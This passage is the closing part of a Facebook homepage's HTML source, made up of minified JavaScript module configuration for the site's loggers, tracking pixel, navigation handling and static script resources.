__rc: ["ReactDOM.classic.prod",
"Aa2qLXAKBLDijRZharoMojX32VoDg8LWuOuDPv_1C6vIYqdTcbTFY1-ozDjKYAT-nTe9KCJDUD-tqsZM6u9HFbXxd9n1EnPLOQ"
]
}, -1],
["cr:1344487", ["ReactDOM-prod.classic"], {
__rc: ["ReactDOM-prod.classic",
"Aa2-xGivTGyU7KnP4ZHbEexilnfw3sCO4DwdnWpllttyYVuwVxb1T5YMswKtawGVbqWpEnFMOrxC-GS3BzJi2UxDLnlbvd62MWZPvpbH"
]
}, -1],
["cr:1292369", ["SchedulerTracing-prod.classic"], {
__rc: ["SchedulerTracing-prod.classic",
"Aa2qLXAKBLDijRZharoMojX32VoDg8LWuOuDPv_1C6vIYqdTcbTFY1-ozDjKYAT-nTe9KCJDUD-tqsZM6u9HFbXxd9n1EnPLOQ"
]
}, -1],
["cr:1353359", ["EventListenerImplForBlue"], {
__rc: ["EventListenerImplForBlue",
"Aa1FX8fzshj6ze8ot7JzWcak_lxJ1enFOWiUNk6dXX26__c7D-pHjQoSphFE5JWbUABQ7EdVGRy2gMd6HdAFdCVWfDtUXKdXKg"
]
}, -1],
["KillabyteProfilerConfig", [], {
htmlProfilerModule: null,
profilerModule: null,
depTypes: {
BL: "bl",
NON_BL: "non-bl"
}
}, 1145],
["QuicklingConfig", [], {
version: "1003448310;0;",
sessionLength: 30,
inactivePageRegex: "^/(fr/u\\.php|ads/|advertising|ac\\.php|ae\\.php|a\\.php|ajax/emu/(end|f|h)\\.php|badges/|comments\\.php|connect/uiserver\\.php|editalbum\\.php.+add=1|ext/|feeds/|help([/?]|$)|identity_switch\\.php|isconnectivityahumanright/|intern/|login\\.php|logout\\.php|sitetour/homepage_tour\\.php|sorry\\.php|syndication\\.php|webmessenger|/plugins/subscribe|lookback|brandpermissions|gameday|pxlcld|comet|worldcup/map|livemap|work/reseller|([^/]+/)?dialog|legal|.+\\.pdf$|.+/settings/)",
badRequestKeys: ["nonce", "access_token", "oauth_token", "xs",
"checkpoint_data", "code"
],
logRefreshOverhead: false
}, 60],
["TrackingConfig", [], {
domain: "https://pixel.facebook.com"
}, 325],
["WebStorageMonsterLoggingURI", [], {
uri: "/ajax/webstorage/process_keys/?state=1"
}, 3032],
["WebDevicePerfInfoData", [], {
needsFullUpdate: true,
needsPartialUpdate: false,
shouldLogResourcePerf: false
}, 3977],
["BrowserPaymentHandlerConfig", [], {
enabled: false
}, 3904],
["TimeSpentConfig", [], {
"0_delay": 0,
"0_timeout": 8,
delay: 1000,
timeout: 64
}, 142],
["cr:1351741", ["CometEventListener"], {
__rc: ["CometEventListener",
"Aa16fzWSa6rn_TUF36iA3rCDwPQmy3ks2i87H6qE4wp_-JUCZfd4aBgCWl0dHgGLTGGW4Lrzp6_-Xxq53PzPO6bub7KYPJuNAracYD33GWmKTPaukT97"
]
}, -1],
["cr:1634616", ["UserActivityBlue"], {
__rc: ["UserActivityBlue",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:844180", ["TimeSpentImmediateActiveSecondsLoggerBlue"], {
__rc: ["TimeSpentImmediateActiveSecondsLoggerBlue",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:1187159", ["BlueCompatBroker"], {
__rc: ["BlueCompatBroker",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["ImmediateActiveSecondsConfig", [], {
sampling_rate: 0
}, 423]
],
require: [
["TrackingPixel", "loadWithNoReferrer", [],
[
"https://cx.atdmt.com/?f=AYxYeDd5DqMVXKJZce7TxemuRHl2cXitPO2iGgADlaZFFx1GZRQu-4fEZsNJmqPOBFRXkLl7Yi-6CjObwZnqwJ9_&c=124359988&v=1&l=2"]
],
["CavalryLoggerImpl", "startInstrumentation", [],
[]
],
["NavigationMetrics", "setPage", [],
[{
page: "/",
page_type: "normal",
page_uri: "https://www.facebook.com/",
serverLID: "6939598592736256614-0"
}]
],
["FalcoLoggerTransports", "attach", [],
[]
],
["Chromedome", "start", [],
[
[]
]
],
["DimensionTracking"],
["HighContrastMode", "init", [],
[{
isHCM: false,
spacerImage: "https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/-PAXP-deijE.gif"
}]
],
["ClickRefLogger"],
["DetectBrokenProxyCache", "run", [],
[0, "c_user"]
],
["NavigationClickPointHandler"],
["ServiceWorkerURLCleaner", "removeRedirectID", [],
[]
],
["WebStorageMonster", "schedule", [],
[]
],
["WebDevicePerfInfoLogging", "doLog", [],
[]
],
["Artillery", "disable", [],
[]
],
["ScriptPathLogger", "startLogging", [],
[]
],
["TimeSpentBitArrayLogger", "init", [],
[]
],
["RequireDeferredReference", "unblock", [],
[
["VisualCompletionGating"]
]
]
]
},
hsrp: {
hsdp: {
clpData: {
"1871697": {
r: 1,
s: 1
},
"1829319": {
r: 1
},
"1743690": {
r: 1
},
"1829320": {
r: 1
},
"1843988": {
r: 1
}
},
gkxData: {
"1427308": {
result: false,
hash: "AT4N7BzUkGfi0OG1IXY"
}
}
},
hblp: {
sr_revision: 1003448310,
consistency: {
rev: 1003448310
},
rsrcMap: {
nng2r: {
type: "js",
src: "https://static.xx.fbcdn.net/rsrc.php/v3iX3c4/yS/l/en_GB/6KyLtGqXAOA.js?_nc_x=Ij3Wp8lg5Kz"
},
FEt5G: {
type: "js",
src: "https://static.xx.fbcdn.net/rsrc.php/v3/y_/r/JopZtdti8dq.js?_nc_x=Ij3Wp8lg5Kz"
}
}
}
},
allResources: ["IqnzN", "nng2r", "b/C9s", "FEt5G", "9OX9e", "dAiGV", "KbYEx",
"Dnrgo"
],
onload: [
"CavalryLogger.getInstance(\"6939598592736256614-0\").setTTIEvent(\"t_domcontent\");"
],
onafterload: [
"CavalryLogger.getInstance(\"6939598592736256614-0\").collectBrowserTiming(window)",
"window.CavalryLogger&&CavalryLogger.getInstance().setTimeStamp(\"t_paint\");",
"if (window.ExitTime){CavalryLogger.getInstance(\"6939598592736256614-0\").setValue(\"t_exit\", window.ExitTime);};"
]
});
}));
</script>
</body>
</html>